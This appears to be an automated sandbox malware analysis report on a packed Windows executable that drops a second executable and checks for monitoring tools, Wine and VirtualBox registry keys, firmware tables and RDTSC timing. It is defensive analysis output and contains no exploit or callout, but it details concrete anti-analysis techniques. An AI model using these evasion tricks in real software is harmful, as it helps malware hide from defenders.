Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Section loaded: sspicli.dll	Jump to behavior

Source: file.exe

Static file information: File size 2955264 > 1048576

Source: file.exe

Static PE information: Raw size of gcjkebaw is bigger than: 0x100000 < 0x2a6200

Source:

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.730000.0.unpack :EW;.rsrc :W;.idata :W;gcjkebaw:EW;forwcvfp:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gcjkebaw:EW;forwcvfp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Unpacked PE file: 4.2.ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W;lzzfrkam:EW;epgvtoot:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: real checksum: 0x2b0938 should be: 0x2b6d98
Source: file.exe	Static PE information: real checksum: 0x2d6737 should be: 0x2d55b4

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: gcjkebaw
Source: file.exe	Static PE information: section name: forwcvfp
Source: file.exe	Static PE information: section name: .taggant
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name:
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name: .idata
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name: lzzfrkam
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name: epgvtoot
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C421C9 push ss; retn 0000h	0_3_00C421CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CC3 pushfd ; ret	0_3_00C39CC6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CC7 pushfd ; ret	0_3_00C39CCA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CCB pushfd ; ret	0_3_00C39CCE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CCF pushfd ; ret	0_3_00C39CD2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CD3 pushfd ; ret	0_3_00C39CD6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CD7 pushfd ; ret	0_3_00C39CDA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CDB pushfd ; ret	0_3_00C39CDE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CDF pushfd ; ret	0_3_00C39CE2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CE3 pushfd ; ret	0_3_00C39CE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CE7 pushfd ; ret	0_3_00C39CEA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CEB pushfd ; ret	0_3_00C39CEE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CEF pushfd ; ret	0_3_00C39CF2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CF3 pushfd ; ret	0_3_00C39CF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CF7 pushfd ; ret	0_3_00C39CFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CFB pushfd ; ret	0_3_00C39CFE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C81 pushfd ; ret	0_3_00C39C82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C85 pushfd ; ret	0_3_00C39C86
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C89 pushfd ; ret	0_3_00C39C8A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C8D pushfd ; ret	0_3_00C39C8E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C91 pushfd ; ret	0_3_00C39C92
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C95 pushfd ; ret	0_3_00C39C96
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C98 pushfd ; ret	0_3_00C39C9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C9C pushfd ; ret	0_3_00C39C9E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CA0 pushfd ; ret	0_3_00C39CA6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CB8 pushfd ; ret	0_3_00C39CBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39CBF pushfd ; ret	0_3_00C39CC2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C40 pushfd ; ret	0_3_00C39C42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C44 pushfd ; ret	0_3_00C39C46
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C48 pushfd ; ret	0_3_00C39C4A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_00C39C4C pushfd ; ret	0_3_00C39C4E

Source: file.exe	Static PE information: section name: entropy: 7.972133901620748
Source: ZXCELRXK9FXBC48TJDYH4AM8OTM.exe.0.dr	Static PE information: section name: entropy: 7.799960243956827

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZXCELRXK9FXBC48TJDYH4AM8OTM.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 907F23 second address: 907F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 907F2A second address: 907F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90705D second address: 907067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFA70D2D1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 907067 second address: 90706B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 907488 second address: 90748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90748C second address: 9074A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DCh 0x00000007 jg 00007FFA707966D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9074A8 second address: 9074AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9074AC second address: 9074BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DBh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9074BD second address: 9074E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B6h 0x00000007 jmp 00007FFA70D2D1AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9074E6 second address: 9074EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9074EF second address: 907513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA70D2D1B3h 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jnp 00007FFA70D2D1A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9077C4 second address: 9077D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FFA707966D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AB87 second address: 90ABAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b mov edi, 5D9297D9h 0x00000010 push 42EA501Ah 0x00000015 je 00007FFA70D2D1B8h 0x0000001b push eax 0x0000001c push edx 0x0000001d js 00007FFA70D2D1A6h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90ABAA second address: 90ABAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90ABAE second address: 90AC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 42EA509Ah 0x0000000d mov esi, ecx 0x0000000f mov dword ptr [ebp+122D2E92h], edi 0x00000015 push 00000003h 0x00000017 xor edx, 56AC44A2h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 sbb dh, FFFFFFE9h 0x00000023 pop esi 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007FFA70D2D1A8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 call 00007FFA70D2D1AEh 0x00000045 jmp 00007FFA70D2D1B7h 0x0000004a pop edi 0x0000004b mov edi, dword ptr [ebp+122D2045h] 0x00000051 call 00007FFA70D2D1A9h 0x00000056 push eax 0x00000057 push edx 0x00000058 jnp 00007FFA70D2D1A8h 0x0000005e push esi 0x0000005f pop esi 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AC33 second address: 90AC4E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFA707966D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA707966DCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AC4E second address: 90ACA7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFA70D2D1A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnc 00007FFA70D2D1B0h 0x00000014 mov eax, dword ptr [eax] 0x00000016 jo 00007FFA70D2D1B9h 0x0000001c jmp 00007FFA70D2D1B3h 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFA70D2D1B8h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90ACA7 second address: 90ACAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AE6A second address: 90AE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AE70 second address: 90AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FFA707966DCh 0x0000000b pop ecx 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 js 00007FFA707966D8h 0x00000016 mov ecx, eax 0x00000018 mov dword ptr [ebp+122D236Fh], ebx 0x0000001e push 00000000h 0x00000020 js 00007FFA707966DEh 0x00000026 push ecx 0x00000027 sub dword ptr [ebp+122D20C3h], esi 0x0000002d pop edx 0x0000002e call 00007FFA707966D9h 0x00000033 pushad 0x00000034 js 00007FFA707966DCh 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEB7 second address: 90AEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jne 00007FFA70D2D1A6h 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007FFA70D2D1B0h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jbe 00007FFA70D2D1AAh 0x0000001d push ecx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEEA second address: 90AEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFA707966D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AEF5 second address: 90AFBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FFA70D2D1B3h 0x00000012 pop eax 0x00000013 push eax 0x00000014 jmp 00007FFA70D2D1B1h 0x00000019 pop ecx 0x0000001a push 00000003h 0x0000001c jmp 00007FFA70D2D1B7h 0x00000021 push 00000000h 0x00000023 call 00007FFA70D2D1ACh 0x00000028 call 00007FFA70D2D1B0h 0x0000002d cmc 0x0000002e pop esi 0x0000002f pop ecx 0x00000030 mov dh, 43h 0x00000032 push 00000003h 0x00000034 call 00007FFA70D2D1B1h 0x00000039 pop ecx 0x0000003a call 00007FFA70D2D1A9h 0x0000003f jno 00007FFA70D2D1C0h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b ja 00007FFA70D2D1A6h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 90AFBE second address: 90B01E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FFA707966DEh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007FFA707966DCh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 jmp 00007FFA707966E1h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FFA707966DFh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9290EA second address: 9290F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92924F second address: 92925A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFA707966D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9293DB second address: 9293E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFA70D2D1A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9293E6 second address: 929407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA707966E4h 0x00000008 jo 00007FFA707966D6h 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92955A second address: 929577 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA70D2D1A6h 0x00000008 jmp 00007FFA70D2D1ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007FFA70D2D1A8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929577 second address: 92957C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92957C second address: 929597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFA70D2D1A6h 0x0000000a pop esi 0x0000000b jmp 00007FFA70D2D1AAh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929597 second address: 9295B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966E7h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9295B7 second address: 9295BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9296F7 second address: 929701 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFA707966D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929701 second address: 929706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 929706 second address: 92972A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFA707966D6h 0x0000000a jg 00007FFA707966D6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFA707966DCh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92972A second address: 92972F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
